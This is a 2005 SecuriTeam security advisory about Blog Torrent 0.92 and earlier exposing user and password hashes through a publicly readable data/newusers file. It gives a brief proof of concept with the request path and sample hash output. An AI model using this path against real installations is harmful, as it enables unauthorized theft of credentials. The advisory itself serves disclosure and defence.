Security Advisory: [UNIX] Blog Torrent Remote User and Password Disclosure

[EN] securityvulns.ru
no-pyccku

Related information
  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)
  [EXPL] SimplePHPBlog Password Disclosure (Exploit)
  [EXPL] ezUpload path Parameter Command Execution (Exploit)
  SQL in PHPTB Topic Boards 2.0
  [SA16420] Dev-PHP NULL Character File Display Weakness

From: SECURITEAM <support_(at)_securiteam.com>
Date: 14.08.2005
Subject: [UNIX] Blog Torrent Remote User and Password Disclosure

The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Blog Torrent Remote User and Password Disclosure
------------------------------------------------------------------------

SUMMARY

" <http://www.blogtorrent.com/> Blog Torrent is free, open-source
software
from <http://www.downhillbattle.org/> Downhill Battle that provides an
easy way to share large files on your website without large storage or
bandwidth costs."

Blog Torrent has been found to contain a vulnerability that allows
attackers to disclose the product's user and password hashes.

DETAILS

Vulnerable Systems:
* BlogTorrent versions 0.92 and prior

Proof of concept:
http://test/path_of_blog/data/newusers :
d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:
Email17:email@email4:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

Username (crypt in md5) -> 14ae696abdca1688dd577fe486c3981f331457b0d7
Password (crypt in md5) -> d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

ADDITIONAL INFORMATION

The information has been provided by <mailto:LazyCrs@GMail.com> LazyCrs.
The information has been provided by <mailto:pjphem@mybox.it> pjphem.
The original article can be found at:
<http://www.milw0rm.com/id.php?id=1097>
http://www.milw0rm.com/id.php?id=1097

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.

test server